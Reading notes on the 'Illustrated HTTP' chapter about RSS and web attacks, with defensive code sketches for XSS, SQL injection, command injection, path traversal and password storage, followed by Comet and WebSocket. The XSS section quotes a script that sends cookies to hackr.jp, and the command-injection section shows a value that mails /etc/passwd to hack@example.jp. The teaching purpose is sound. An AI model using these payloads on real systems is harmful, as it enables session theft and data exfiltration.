5. "Illustrated HTTP" - RSS and Network Attacks - Technical Reading Notes

5. "Illustrated HTTP" - RSS and Network Attacks

This section covers RSS and common network attacks. RSS tends to be seen as a "why hasn't it died yet" technology, but I found it surprisingly useful once I understood it and tried it.

Network attacks occasionally come up as interview questions, so it is still worth understanding the basic attack methods and the common defenses.

Key points

An introduction to the history of RSS and to its significance and value. Personally, I think RSS suits people who study independently very well.
An introduction to web attack methods: understand the basic, common attacks, which are not far removed from our daily lives.
Bottlenecks and future developments: because the book was written some time ago, some of this content is "outdated" and can be skipped.

5.1 RSS

5.1.1 RSS History

Most of the following content comes from Wikipedia, and since most of it is theoretical content, I will not explain too much.

RSS (simple syndication) and Atom are both general names for document formats used to distribute news and blog entries.

RSS (in full: RDF Site Summary or Really Simple Syndication), usually rendered in Chinese as "simple information aggregation" or "aggregated content", is a feed format specification used to aggregate the updated content of multiple websites and automatically notify subscribers.

With RSS, subscribers no longer need to check manually whether a website has new content. RSS can also combine updates from multiple websites and present them as summaries, which helps subscribers quickly pick out the important information and choose what to read.

The version history of RSS is as follows:

RSS 0.9 (RDF Site Summary): The original RSS version, developed by Netscape Communications in March 1999 for its portal. Its basic structure was built on the initial RDF specification.
RSS 0.91 (Rich Site Summary): Extends RSS 0.9 with additional elements, developed in July 1999. It drops RDF and is written in plain XML.
RSS 1.0 (RDF Site Summary): Published in December 2000 by the RSS-DEV working group while the RSS specifications were in a state of confusion. It returns to the RDF approach used in RSS 0.9.
RSS 2.0 (Really Simple Syndication): A separate line of development from RSS 1.0 that adds compatibility with RSS 0.91. It was developed by UserLand Software and released in September 2002 (December 2000 is the date of UserLand's RSS 0.92).

RSS has since evolved into several different versions, which fall into two main branches (RDF and 2.X).

The RDF (or RSS 1.X) branch includes the following versions:

RSS 0.90 is the original Netscape RSS release. It was called _RDF Site Summary_, but it is based on an early working draft of the RDF standard and is not compatible with the final RDF recommendation.
RSS 1.0 is the open format of the RSS-DEV working group, and the name again stands for _RDF Site Summary_. Like RSS 0.90 it is an RDF format, but it is not fully compatible with 0.90 because it is based on the final RDF 1.0 recommendation.
RSS 1.1 is also an open format, designed to update and replace RSS 1.0. The specification is an independent draft and is not supported or endorsed in any way by the RSS-DEV working group or any other organization.

The RSS 2.X branch (originally UserLand, now Harvard) includes the following releases:

RSS 0.91 is the simplified version of RSS published by Netscape, and also the version number of the simplified format originally advocated by Dave Winer of UserLand Software. The Netscape version is now called _Rich Site Summary_; it is no longer an RDF format, but it is relatively easy to use.
RSS 0.92 to 0.94 are extensions of the RSS 0.91 format. They are mostly compatible with each other and with the Winer version of RSS 0.91, but not with RSS 0.90.
RSS 2.0.1 carries the internal version number 2.0. It was declared "frozen" but was still updated shortly after its release without changing the version number. RSS now stands for _Really Simple Syndication_. The main change in this release is an explicit extension mechanism based on XML namespaces.

5.1.2 Atom

I have not worked with Atom much either, so the following is taken from the encyclopedia.

Atom is a pair of related standards. The Atom Syndication Format is an XML-based document format for web feeds; the Atom Publishing Protocol (AtomPub or APP) is an HTTP-based protocol for creating and updating web resources.

Atom draws on the experience gained with the various versions of RSS and is widely supported by aggregation tools, both for publishing and for consuming feeds. The Atom feed format was designed as a replacement for RSS, and the Atom Publishing Protocol was meant to replace the various existing publishing methods (e.g. the Blogger API and the LiveJournal XML-RPC Client/Server Protocol). Several Google services use Atom, and the Google Data API (GData) is also based on it.

RSS and Atom are both widely supported and compatible with all major consumer feed readers. RSS is the more widely used of the two thanks to support from early feed readers.

Technically, Atom has several advantages: less restrictive licensing, an IANA-registered MIME type, XML namespaces, URI support, and RELAX NG support.

Atom has the following two standards.

Atom Syndication Format: A website news source format for publishing content. When talking about Atom alone, it means this standard.

Atom Publishing Protocol: A protocol for adding or modifying content on the Web.

For more information, please refer to these two websites:

The Atom Syndication Format:

https://www.rfc-editor.org/rfc/rfc4287.txt

Atom Syndication Format (IBM)

https://www.ibm.com/docs/en/cics-ts/5.3?topic=standards-atom-syndication-format

5.1.3 The Significance of RSS

In most cases, RSS is used to subscribe to blogs and to pull updates from your favorite websites as they appear. Personally, I think of it as a different form of WeChat public account. In recent years, however, WeChat has changed its algorithm, and its push has moved away from the earlier approach to one based on user preferences.

Does RSS still make sense today? Why is anyone still using it? Personally, I think the biggest value of an RSS subscription is that it filters out noise. Reading RSS subscriptions requires a reader application; for software recommendations, please see "References".

RSS has several significant advantages:

It turns passive consumption of information into active acquisition.
It sidesteps the recommendation algorithms of the various Internet companies.
It blocks out the noise of the Internet.
It goes back to basics: not every step "backwards in time" is a mistake.

These points more or less guarantee that many platforms will dislike RSS, because it cuts off their revenue.

Of course, RSS has its shortcomings. The biggest is that it is too niche, so it would not be surprising if it disappeared one day. Because there is almost no profit in it, the only competition is among the few groups that write the standards, which is a relatively rare situation.

In fact, a considerable number of people are still using RSS.

5.2 Web Attacks

To stay simple and efficient, HTTP/1.x remains stateless, and the protocol itself provides almost no security protection. Major network security incidents make the news practically every year; by Murphy's law, this kind of thing will always happen.

Attacks fall into two main groups: active attacks and passive attacks.

Passive attacks mainly use phishing websites or links to lure users into clicking, and then run attack code to obtain personal information from the user's computer. Active attacks hit the target directly, for example traffic floods such as DDoS.

Passive attacks are more common because they cost the attacker almost no effort, while active attacks are mostly aimed at high-traffic, high-value websites.

What follows is a long list of common web attack methods, following the content of the book.

5.2.1 XSS attack

The first is the fairly common XSS attack (cross-site scripting), which is carried out by injecting illegitimate HTML tags or JavaScript. The attacker sets a trap on a website in advance, and users may be attacked when they fill in sensitive personal information.

 http://example.jp/login?ID="> <script>var+f=document.getElementById("login");+f.action="h </script><span+s="

(HTML source code corresponding to this request, excerpt)

Besides capturing login information, an attacker can also use a JavaScript snippet to grab the contents of the cookie and obtain the user's personal information directly, for example with code like the following:

 var content = escape(document.cookie); 
document.write("<img src=http://hackr.jp/?"); 
document.write(content); 
document.write(">");
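The book's examples show the attack; the usual countermeasure is to escape user-supplied values before writing them into HTML. The following is a minimal sketch of that idea, not a complete defense. The function name `escapeHtml` and the sample `id` value are assumptions made for illustration.

```javascript
// Escape the characters that allow user input to break out of HTML text
// or a quoted attribute value.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical value taken from the ID query parameter of the login URL.
const id = '"><script>alert(1)</script>';

// The escaped value stays inside the attribute instead of closing the tag.
const html = '<input type="text" name="ID" value="' + escapeHtml(id) + '">';
console.log(html);
```

Escaping at output time only covers HTML text and attribute contexts; values placed inside scripts or URLs need their own handling.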

5.2.2 SQL Injection

SQL injection happens mainly because developers do not handle SQL rigorously.

For example, the book shows how injecting a single quotation mark into a SQL parameter invalidates the rest of the statement, which lets the attacker read information that should not be accessible.

The fix is relatively simple: avoid concatenating user input directly into the SQL text wherever possible. Instead, use placeholders such as "?" and pass the values as parameters.
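To make the difference concrete, here is a small sketch that only builds query text and does not talk to a database. The table name `books`, the column names, and both function names are hypothetical; a real driver would take the SQL text and the parameter array and bind the values itself.

```javascript
// Unsafe: user input is concatenated into the SQL text.
function buildUnsafeQuery(author) {
  return "SELECT * FROM books WHERE author = '" + author + "' AND visible = 1";
}

// Safer: the SQL text is fixed, and the value travels separately so the
// database driver can bind it as data rather than as SQL.
function buildParameterizedQuery(author) {
  return {
    sql: 'SELECT * FROM books WHERE author = ? AND visible = 1',
    params: [author],
  };
}

// A single quote closes the string literal and "--" comments out the rest.
const input = "alice' --";

console.log(buildUnsafeQuery(input));
// SELECT * FROM books WHERE author = 'alice' --' AND visible = 1

console.log(buildParameterizedQuery(input));
```

In the unsafe version the `visible = 1` condition ends up inside a comment. In the parameterized version the SQL text never changes, whatever the input contains.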

SQL injection obviously works by exploiting the rules of SQL syntax through such special characters. More often than not, of course, the root cause is sloppiness on the part of the site's programmers.

If you think this rarely happens, you are wrong. Plenty of websites in China still have no protection against even the most basic SQL injection.

5.2.3 OS Command Injection

OS command injection attacks are not uncommon. The mining scripts that have plagued cloud servers in recent years are one example. This kind of malware, which rides in on open source components, is particularly nasty.

A concrete case: a feature that takes the user's email address passes it to a shell command, and the attacker uses characters such as the semicolon and the pipe to append extra commands and steal account and password data.

 my $adr = $q->param('mailaddress');

open(MAIL, "| /usr/sbin/sendmail $adr"); 

print MAIL "From: info@example.com\n";

The attacker specifies the following value as the email address.

 ; cat /etc/passwd | mail hack@example.jp

The program receives this value and forms the following command combination.

 | /usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp
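One way to avoid this class of problem is to validate the input and to start the program without going through a shell. The sketch below shows the idea in Node.js rather than Perl. The pattern `ADDRESS_PATTERN` and the functions `validateAddress` and `sendNotice` are illustrative assumptions, and the pattern is deliberately stricter than real email syntax.

```javascript
const { execFile } = require('node:child_process');

// Illustrative, deliberately strict pattern: no spaces, no shell
// metacharacters, and no leading "-" that could be read as an option.
const ADDRESS_PATTERN = /^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;

function validateAddress(address) {
  if (typeof address !== 'string' || !ADDRESS_PATTERN.test(address)) {
    throw new Error('rejected mail address');
  }
  return address;
}

// Not called here: it needs a sendmail binary at this path.
function sendNotice(address, callback) {
  // execFile starts the program directly, without a shell, so ";" and "|"
  // in an argument are never interpreted as command separators.
  const child = execFile('/usr/sbin/sendmail', [validateAddress(address)], callback);
  child.stdin.end('From: info@example.com\n\nHello\n');
}

try {
  validateAddress('; cat /etc/passwd | mail hack@example.jp');
} catch (err) {
  console.log(err.message); // the injected value is rejected before any command runs
}
```

Either measure alone already stops the attack shown above; using both gives a second line of defense if the validation rule turns out to be too loose.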

5.2.4 DDoS Attack

A very direct and brutal attack: the target server is knocked over with a flood of traffic, leaving it paralyzed and unreachable. This is why it is called a denial of service attack (DoS), or a service stop attack; when the flood comes from many machines at once, it is a distributed denial of service attack (DDoS).

There are two main attack methods:

Overloading resources with concentrated requests, in effect forcing the server to do pointless, computation-heavy work until its resources are exhausted.
Attacking a vulnerability so that the service stops. Such vulnerabilities often originate in open source code, for example the notorious FastJson vulnerabilities, which seem to need a fix every few days.

For attackers, DDoS is very cheap, because large numbers of compromised "zombie" machines can be bought overseas to do the work. For an independent, customer-facing website, however, there are few real defenses. Most of the time the only option is to "burn money", because the source of the attack cannot be identified.

5.2.5 Directory Traversal Attacks

A directory traversal attack reaches files that were never meant to be public by requesting permission-sensitive paths, for example using a script to try to read /etc/passwd and harvest user account information.
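A common defense is to resolve the requested path and refuse anything that lands outside the directory being served. The sketch below assumes a hypothetical public root of `/var/www/public` and a hypothetical helper name `resolveInsideRoot`; requests containing `../` segments are the typical way such attacks are attempted.

```javascript
const path = require('node:path');

// Hypothetical directory that holds the files the site is willing to serve.
const PUBLIC_ROOT = path.resolve('/var/www/public');

function resolveInsideRoot(requested) {
  // resolve() collapses "." and ".." segments before the comparison.
  const resolved = path.resolve(PUBLIC_ROOT, requested);
  if (resolved !== PUBLIC_ROOT && !resolved.startsWith(PUBLIC_ROOT + path.sep)) {
    throw new Error('path escapes the public root');
  }
  return resolved;
}

console.log(resolveInsideRoot('img/logo.png'));

try {
  resolveInsideRoot('../../etc/passwd');
} catch (err) {
  console.log(err.message);
}
```

This check works on path strings only. It does not follow symbolic links, so a real server would also need to consider what the files under the root point to.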

5.2.6 Cross-site request forgery

Also known as a CSRF attack. It too uses a trap to trick the user into acting; the attacker then uses the user's identity to carry out operations the user never intended.

5.2.7 Session Attack

Many websites store session information tied to the user's login. In a session attack, the attacker infers or obtains the session ID by various means and then uses it to impersonate the user.

The attack just described is session hijacking, which obtains the information through traps or brute force. The other kind is session fixation: the attacker prepares a session ID in advance, gets the user to log in with it, and once the login completes, the attacker holds an authenticated session. It is a bit like sneaking in through the door behind someone without being noticed, then waiting for the owner to leave before stealing things.

A simple protection is to add an IP check during authentication: if the same identity information arrives from a different IP address, it can be treated as a stolen session.
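The IP check can be sketched in a few lines. The in-memory `sessions` map and the functions `createSession` and `authenticate` are assumptions for illustration; a real application would use its framework's session storage. Legitimate users can also change IP address (mobile networks, for instance), so this rule trades some convenience for safety.

```javascript
// In-memory session store, for illustration only.
const sessions = new Map();

function createSession(sessionId, userId, ip) {
  sessions.set(sessionId, { userId, ip });
}

function authenticate(sessionId, ip) {
  const session = sessions.get(sessionId);
  if (!session) {
    return null;
  }
  if (session.ip !== ip) {
    // Same session ID from a different address: treat it as possible theft
    // and invalidate the session so nobody can keep using it.
    sessions.delete(sessionId);
    return null;
  }
  return session.userId;
}

createSession('abc123', 'user-1', '203.0.113.5');
console.log(authenticate('abc123', '203.0.113.5'));  // same address: accepted
console.log(authenticate('abc123', '198.51.100.7')); // different address: rejected
```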

5.2.8 Clickjacking

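Clickjacking takes advantage of iframes and transparent elements: a transparent button or link is laid over the original page, so a user who believes they are clicking the visible page actually clicks the hidden element, and the associated information is sent along to the attacker.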

5.2.9 Password cracking

Password cracking usually relies on brute force (exhaustive search) or a dictionary attack. Exhaustive search tries every candidate according to a set of rules, so it only works when the key space is small enough. A dictionary attack exploits the fact that users like to build passwords from birthdays or names, and tries a prepared list of likely candidates. A second scenario is cracking passwords that have already been obtained in encrypted form, which again uses dictionary lookups and trial and error.

Common ways of cracking encrypted passwords are as follows:

Inference by exhaustive search or dictionary attack: candidates are run through the same hash function and the results are compared with the stolen values. This works against systems that use common hash functions.
Rainbow table: a database table of plaintext passwords and their corresponding hash values, built to cut the time that exhaustive search and dictionary attacks would otherwise need. It is said to be called a rainbow table because it covers a variety of functions, so the resulting ciphertexts resemble a "rainbow". Rainbow tables are a comparatively effective way of cracking.

The website https://freerainbowtables.com/ publishes a rainbow table of MD5 hash values covering every 1 to 8 character string made up of uppercase letters, lowercase letters, and digits.

Obtaining the key: the attacker obtains the key through network hijacking or similar means, forges requests to the target server with it, and tricks the server into handing over the protected data.
Weaknesses in the encryption algorithm: it is hard to find flaws in today's mainstream encryption algorithms, so this approach has a very low success rate.

The way to defend against password cracking is to limit the number of failed password attempts and to throttle bursts of requests within a short period. For stored passwords, a random value called a "salt" is combined with the password before it is hashed, so that the same password does not always produce the same stored value.
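As a rough illustration of salting, the sketch below uses the scrypt function from Node's built-in crypto module. The function names `hashPassword` and `verifyPassword`, the 16-byte salt, and the 32-byte output length are assumptions chosen for the example, not recommendations from the book.

```javascript
const crypto = require('node:crypto');

function hashPassword(password) {
  // A fresh random salt per password means identical passwords are stored
  // as different values, which defeats precomputed tables.
  const salt = crypto.randomBytes(16);
  const hash = crypto.scryptSync(password, salt, 32);
  return { salt: salt.toString('hex'), hash: hash.toString('hex') };
}

function verifyPassword(password, stored) {
  const salt = Buffer.from(stored.salt, 'hex');
  const expected = Buffer.from(stored.hash, 'hex');
  const actual = crypto.scryptSync(password, salt, expected.length);
  // Constant-time comparison avoids leaking how many bytes matched.
  return crypto.timingSafeEqual(actual, expected);
}

const record = hashPassword('correct horse');
console.log(verifyPassword('correct horse', record)); // true
console.log(verifyPassword('wrong guess', record));   // false
```

The salt is stored next to the hash because it is not a secret; its job is only to make each stored value unique.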

5.2.10 Backdoor program

A backdoor is a hidden entry point that is set up in advance rather than a direct attack launched when a vulnerability is discovered. Through a backdoor, information can be stolen without anything looking wrong during everyday use. Because backdoors are so hard to find, they are a very high-risk form of web attack.

Backdoors usually fall into three types:

Backdoors left in as debug entry points during development.
Backdoors planted by developers for their own benefit.
Backdoors installed by an attacker through some other means.

A brief note on the second type, which has many real-world cases, such as a crude one in which a payment website's payment code was randomly replaced through a backdoor.

There are also skimming backdoors that charge a "handling fee" of "0.00*N1" on every order. Such a backdoor is very hard to spot unless you look closely, and although each amount is tiny, with a very large number of users the income adds up to a huge sum.

These are legal red lines. Do not try them!

5.3 Bottlenecks and "future" developments

The "future" described in the book has by now largely arrived, so this part only needs a quick read.

SPDY (HTTP2.0)
Ajax
WebSocket
Comet
HTTP long connection

5.3.1 SPDY

This part of the content is described in detail in the history of HTTP2.0 in [["Illustrated HTTP" - HTTP Protocol History Development (Key Point)]], and will not be repeated here.

5.3.2 Ajax

The core technology of Ajax is an API called XMLHttpRequest. JavaScript calls it to communicate with the server over HTTP, which allows a web page to be updated partially without a full reload.
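A partial update with XMLHttpRequest can be sketched as follows. The helper name `loadFragment`, the URL, and the element id in the usage comment are hypothetical. The constructor is passed in as a parameter only so that the function can also be exercised outside a browser.

```javascript
// Fetch a piece of text over HTTP and hand it to a callback.
// In a browser, XHR defaults to the built-in XMLHttpRequest constructor.
function loadFragment(url, onText, XHR = globalThis.XMLHttpRequest) {
  const xhr = new XHR();
  xhr.open('GET', url);
  xhr.onload = function () {
    if (xhr.status === 200) {
      onText(xhr.responseText);
    }
  };
  xhr.send();
}

// Browser usage (the URL and element id are made up for this example):
// loadFragment('/news/latest', (text) => {
//   document.getElementById('news').textContent = text;
// });
```

Only the element that receives the text changes; the rest of the page stays as it was, which is the "partial update" the paragraph above refers to.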

5.3.3 Comet

The word literally means "comet". Until WebSocket fully solved its browser compatibility problems, there was widespread demand for "server push" (Comet technology), and demand drives technology. Comet was almost indispensable in web-based instant messaging solutions.

Technology before Comet:

Before Comet, server push was implemented with Flash, which has since been abandoned. It depended on users installing the Flash plug-in voluntarily. Flash could easily call into JavaScript and provided the XMLSocket class for reverse push, so for a long time it was practically the only way to do server push.

The other technology is the long-dead Java Applet, which made socket connections and received server push through java.net.Socket, java.net.DatagramSocket, or java.net.MulticastSocket. Its fatal flaw was that an Applet could not work together with JavaScript to refresh the page dynamically in real time.

How did Comet develop?

Real-time Comet itself depends on the spread and extension of Ajax, so Comet is defined as: "server push" based on HTTP long connections that requires no plug-in on the browser side.

Comet implementation?

There are two ways to implement Comet: long polling based on Ajax, and streaming based on iframe and htmlfile.

First, long polling. The client has to keep re-establishing HTTP connections with the server, and each connection carries a lot of unnecessary network overhead.

The second uses a nested iframe together with htmlfile streaming. Although this iframe technique has long fallen out of favor, it was once one of the few options for implementing long connections and played an important role.

The principle is simple: the URL that delivers the data is set as the src attribute of the iframe. The server does not return a page in the iframe; it returns JavaScript calls for the client, and the client executes each call as it arrives.

In practice, this kind of embedded JavaScript call in an iframe does not behave well in many browsers, so Google later proposed using the htmlfile ActiveX object, in effect wrapping iframe and htmlfile into a JavaScript Comet object.

Because old versions of IE were incompatible with Chrome and Firefox, this used to be painful (as IE compatibility always was), and it required extra boilerplate and workarounds on the front end, which made it more trouble.

Comet works by returning a response as soon as the server has an update, simulating push with a delayed response: when a request arrives, the server holds the response in a pending state and only returns it once the content on the server side has changed.
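The "hold the response until there is an update" idea can be modeled without any networking. In the sketch below, the class name `LongPollHub` and its methods `hold` and `publish` are invented for illustration; each callback stands in for one HTTP response that the server has not yet sent.

```javascript
class LongPollHub {
  constructor() {
    // Callbacks of requests that are currently being held open.
    this.pending = [];
  }

  // Called when a client request arrives: do not answer yet, just park it.
  hold(respond) {
    this.pending.push(respond);
  }

  // Called when content changes: answer every parked request, then forget
  // them. Each client has to send a new request to wait for the next update.
  publish(update) {
    const waiting = this.pending;
    this.pending = [];
    for (const respond of waiting) {
      respond(update);
    }
    return waiting.length;
  }
}

const hub = new LongPollHub();
hub.hold((update) => console.log('client received:', update));
hub.publish('price changed'); // the parked request is answered now
hub.publish('price changed again'); // nobody is waiting, so nothing is sent
```

The second `publish` call reaches no one, which shows why the request still has to come from the client every time.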

Related open source components
Pushlet: An open source Comet framework that uses the observer model
IComet: A comet/push server developed in C++ that supports millions of concurrent connections

Comet was a transitional "plug-in" that solved the server push problem in its day. It solved the problem to a degree, but only by an indirect workaround (in the spirit of the idiom "besiege Wei to rescue Zhao"): fundamentally, the request is still sent by the client.

So Comet is not worth too much effort. More details can be found in the "References" section.

5.3.4 HTTP long connection feature

In addition to the many limitations of Comet itself, HTTP persistent connections themselves have some notable features.

HTTP/1.1 long connection limit: a client should not keep more than two HTTP connections open to the same server. In IE, downloads beyond two files are blocked.
Server-side performance and scalability: Comet holds a connection open for a long time, which is a problem when Ajax requests are frequent. Although java.nio, introduced in Java 1.4, lets a thread return to the thread pool while its connection is idle, frequent Ajax requests leave few connections idle and performance still suffers. Jetty has some optimizations for Comet for this reason, described in the article "AJAX, Comet and Jetty" (unfortunately no longer available).
Separating control information from data display: closing an HTTP long connection relies on the client sending a close request, but in many cases the client simply closes the web page, and the server is left blocked waiting for that request. In the Ajax implementation, the close request is sent asynchronously to solve this. The iframe-based method needs two iframes, one for display and one for exchanging control information, so that control requests get a quick response and are not blocked behind display data.
Maintaining a heartbeat: the server needs a mechanism to check regularly whether the client is still alive. If the connection is still open, the server goes back to its blocking read; if the client has gone away, the server hits an exception, closes the connection, and releases the resources.
For Ajax-based long polling, the server needs a timer: if the client sends no new request within the timeout, the server assumes the client has closed and releases its resources, so that server resources are used effectively.
Finally, if the server itself runs into a problem, it also needs to notify the client and release resources to prevent leaks.
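The timer-based cleanup in the list above can be sketched as a periodic sweep over the time each client was last seen. The function name `sweepIdleClients`, the map layout, and the 30-second timeout are assumptions for this example.

```javascript
// lastSeen maps a client id to the timestamp (ms) of its latest request.
// Clients that have been silent for longer than timeoutMs are dropped so
// the server can release whatever it was holding for them.
function sweepIdleClients(lastSeen, now, timeoutMs) {
  const released = [];
  for (const [clientId, seenAt] of lastSeen) {
    if (now - seenAt > timeoutMs) {
      lastSeen.delete(clientId);
      released.push(clientId);
    }
  }
  return released;
}

const lastSeen = new Map([
  ['client-a', 1000],   // silent for a long time
  ['client-b', 58000],  // polled recently
]);

// A server would typically run this from setInterval; here it runs once
// with a fixed "now" of 60 seconds.
console.log(sweepIdleClients(lastSeen, 60000, 30000));
```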

5.3.5 WebSocket

WebSocket was originally part of the HTML5 standard, but it gradually split off and became an independent protocol. Modern mainstream browsers all support WebSocket (old versions of IE are the exception).

The WebSocket protocol was standardized on December 11, 2011 as RFC 6455 - The WebSocket Protocol.

WebSocket addresses the pain points of Comet and Ajax. Once a WebSocket connection is established between the web server and the client, all subsequent communication uses this dedicated protocol; in other words, it works like a protocol "upgrade". The client no longer has to fetch data actively, because the server can push data straight to the client once the connection is up.

Design purpose: WebSocket was originally meant to fix the flaw that Ajax and Comet inherit from XMLHttpRequest, namely that a request can only be initiated by the client.

This is not to say that real-time updates are impossible with client requests alone. One way is to poll for information, but polling means requesting the server over and over, and Comet was only a transitional, compatibility-minded workaround.

WebSocket has the following characteristics:

(1) Built on the TCP protocol, it is compatible up and down.

(2) It is highly compatible with HTTP. The default ports are also 80 and 443, and the handshake uses HTTP, so the handshake is hard to block and can pass through HTTP proxies.

(3) Lightweight response format, efficient.

(4) Text can be sent, and binary data can also be sent.

(5) There is no same-origin restriction, and the client can communicate with any server.

(6) The protocol identifier is ws (wss if encrypted), and the server address is written as a URL.

(7) Reduce the amount of traffic, because once the connection is established, the connection state will be maintained, so the overhead of the HTTP header will also be reduced.

Example:

 // Create WebSocket connection.
const socket = new WebSocket('ws://localhost:8080');

// Connection opened
socket.addEventListener('open', function (event) {
    socket.send('Hello Server!');
});

// Listen for messages
socket.addEventListener('message', function (event) {
    console.log('Message from server ', event.data);
});

The basic steps are as follows:

Handshake request. Once the HTTP connection is established, the client uses the HTTP Upgrade header field to tell the server that it wants to switch protocols. In other words, an "upgrade protocol" request is sent over the existing HTTP connection.

 GET /chat HTTP/1.1
Host: server.example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Origin: http://example.com
Sec-WebSocket-Protocol: chat, superchat
Sec-WebSocket-Version: 13

Note: the Sec-WebSocket-Key field carries the key value that the handshake depends on. The Sec-WebSocket-Protocol field lists the subprotocols the client wants to use.

The initial HTTP connection may already have exchanged data, so the server answers the earlier request with a response carrying status code 101 Switching Protocols.
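As a supplement that is not spelled out in these notes: RFC 6455 has the server prove that it understood the handshake by returning a Sec-WebSocket-Accept header derived from the client's Sec-WebSocket-Key. The sketch below computes that value with Node's crypto module; the function name `computeAccept` is an assumption, while the GUID constant is the fixed string defined by the RFC.

```javascript
const crypto = require('node:crypto');

// Fixed GUID defined by RFC 6455 for the opening handshake.
const WEBSOCKET_GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11';

// Sec-WebSocket-Accept = base64( SHA-1( key + GUID ) )
function computeAccept(secWebSocketKey) {
  return crypto
    .createHash('sha1')
    .update(secWebSocketKey + WEBSOCKET_GUID)
    .digest('base64');
}

// Key taken from the handshake request shown above.
console.log(computeAccept('dGhlIHNhbXBsZSBub25jZQ=='));
// s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
```

The client performs the same computation and closes the connection if the header in the 101 response does not match.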

If you don't know what 101 is, that's fine. The chapter [["Illustrated HTTP" - Status Code]] shows that it is simply an informational status code with no effect of its own. I translated the explanation below myself, which helps it stick.

[Figure: 101 status code]

The WebSocket diagram in the book is good; it gives a clear feel for how WebSocket, as a separate protocol, cooperates with HTTP.

[Figure: WebSocket]

There are many details of WebSocket that could be expanded on. Since the book is aimed at beginners, I will not go into them in this reading note. I also collected some material from the Internet as further reading; for details, please see the "References" section.

Web History

The web history part covers HTML, CSS, JavaScript, and the DOM, and also introduces servlets, which are rarely used directly anymore. Of these technologies, servlets deserve a mention. They may seem to have nothing to do with today's web, but they are still very much alive in another form: Spring wraps them so thoroughly that they have disappeared from view. If you want to learn web development well, mastering servlets is essential.
